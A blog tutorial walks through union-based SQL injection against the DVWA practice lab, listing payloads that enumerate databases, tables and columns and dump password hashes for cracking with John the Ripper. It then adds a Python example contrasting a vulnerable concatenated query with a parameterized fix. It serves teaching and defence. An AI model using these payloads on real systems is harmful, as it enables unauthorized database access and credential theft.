Wednesday, Feb 21, 2018
Union Based Injection using John the Ripper


System used :: Kali Linux

Testing on localhost :: (DVWA)

  • Open XAMPP on Linux and start the MySQL and Apache servers

  • Open Iceweasel and write

Login to the Application

Username : admin , Password : password

    • Set the security level from 'High' to 'Low' under DVWA Security

    • Set up the database under the Setup tab

    • Click on SQL Injection to begin testing

  • Enter 1 in the User ID Field

The form is submitted with the GET method, so the parameters are visible in the URL.

  • Check for exception handling:

        '&Submit=Submit#

  • Check using a true condition:

        $' or '1'='1&Submit=Submit#

The above injection reveals the user IDs in the userdb database.

  • Check the number of columns returned by the SQL query:

        ' order by 1--+&Submit=Submit#
        ' order by 5--+&Submit=Submit#
        ' order by 3--+&Submit=Submit#
        ' order by 2--+&Submit=Submit#

This shows that the number of columns is 2.

  • Use 'union select' to consolidate the 2 columns:

        ' union select 1, 2--+&Submit=Submit#

  • For vulnerable columns, make the id -1:

        id=-1' union select 1, 2--+&Submit=Submit#

  • Check for the version:

        ' union select null, version()--+&Submit=Submit#

  • To search for the database, version and user:

        ' union select concat(database(), ' ', version()), user()--+&Submit=Submit#

  • To search for the corresponding tables:

        ' union select null, table_name from information_schema.tables --+&Submit=Submit#

  • To check for a specific table, for example 'users', in the particular database:

        ' union select null, table_name from information_schema.tables where table_name like "users%"--+&Submit=Submit#

This SQL query will display all the tables matching the keyword "users".

  • Under the 'users' table, check for the column names:

        ' union select null, column_name from information_schema.columns where table_name = "users"--+&Submit=Submit#

  • Check and consolidate the details of all the columns:

        ' union select concat(user_id,' ',first_name,' ',last_name,' ',avatar),concat(user,' ',password) from users--+&Submit=Submit#

    • Copy the users and passwords and save them in <user>:<password> format in a "password.txt" file under /Home

    • Use the John the Ripper application to crack the passwords, with the format set to MD5


Hence we have user names & their corresponding passwords.
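
The root cause of every step above is that the User ID value is pasted into the SQL text. The following is an added example, not part of the original tutorial or of DVWA's code, that shows the concatenated lookup next to a parameterized one. It assumes an in-memory SQLite database in place of MySQL, a constructed users table with constructed rows, a two-column query matching the column count found above, and hypothetical function names.

```python
import hashlib
import re
import sqlite3


def make_db():
    """Constructed stand-in for the lab's users table (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    rows = [(1, "admin", "admin", "admin", "password"),
            (2, "Alice", "Example", "alice", "constructed-pw")]
    for uid, first, last, user, pw in rows:
        digest = hashlib.md5(pw.encode()).hexdigest()  # unsalted MD5, as cracked above
        db.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                   (uid, first, last, user, digest))
    return db


def lookup_vulnerable(db, user_id):
    # The input becomes part of the SQL text, so a quote in user_id closes the
    # string literal and whatever follows is parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return db.execute(sql).fetchall()


def lookup_hardened(db, user_id):
    # Allow-list the expected shape first, then bind the value as a parameter:
    # it is passed to the engine as data and never reaches the SQL parser.
    if not re.fullmatch(r"[0-9]{1,9}", user_id):
        return []
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    union = "-1' union select user, password from users--"
    for value in ("1", "1' or '1'='1", union):
        print(repr(value))
        print("  vulnerable:", lookup_vulnerable(db, value))
        print("  hardened:  ", lookup_hardened(db, value))
```

With the concatenated query the last two inputs return every row and the stored hashes; with the bound parameter they return nothing, and only the plain numeric ID is answered.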


This tutorial is by Lucideus (Rahul Tyagi). Image quality may not be good, so that the post can load in a proper time. Stay tuned for more tutorials.
